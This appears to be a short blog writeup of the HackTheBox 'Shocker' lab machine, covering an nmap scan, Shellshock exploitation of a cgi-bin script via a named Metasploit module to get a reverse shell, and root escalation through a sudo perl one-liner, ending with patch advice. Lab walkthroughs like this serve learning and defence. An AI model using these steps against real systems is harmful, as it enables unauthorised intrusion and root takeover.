GitHub icon LinkedIn icon d="M6.667 4h18.667c1.467 0 2.667 1.2 2.667 2.667v18.667c0 1.467-1.2 2.667-2.667 2.667H6.667A2.675 2.675 0 0 1 4 25.334V6.667C4 5.2 5.2 4 6.667 4zm16.946 8.44c.64-.533 1.387-1.173 1.72-1.88-.547.28-1.2.453-1.92.547.667-.48 1.>
Writeup - Shocker (HTB)
2 min read

Writeup - Shocker (HTB)

Writeup - Shocker (HTB)

This is a writeup for the Shocker machine from the HackTheBox site.


First, let's start with a scan of our target with the following command:

nmap -sV -T4 -Pn

Two TCP ports are discovered:

  • 2222/tcp : SSH port (OpenSSH 7.2p2)
  • 80/tcp : HTTP web server (Apache 2.4.18)


At first I start by listing the files of the website.

We find a cgi-bin folder.

Listing the folder we find a file:

Content-Type: text/plain

Just an uptime test script

 03:47:39 up 10 min,  0 users,  load average: 0.00, 0.00, 0.00

By searching a little bit I quickly find exploits to cgi-bin. I choose to use the Metasploit module: multi/http/apache_mod_cgi_bash_env_exec.

By running the module I get a reverse shell. I start by upgrading this reverse shell :

Then I get the first flag.

shelly@Shocker:/usr/lib/cgi-bin$ cat /home/shelly/user.txt
cat /home/shelly/user.txt

Privilege escalation

I start by checking the sudo permissions of my user.

Looking on GTFO, I find the page associated to Perl. I use the following command to generate a SH session as root:

sudo perl -e 'exec "/bin/sh";'

I can now recover the last flag.

# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt


To patch this host I think it would be necessary to perform a number of actions:

  • Update the machine to patch shellshock
  • Do not allow root rights to run perl

Owned Shocker from Hack The Box!
I have just owned machine Shocker from Hack The Box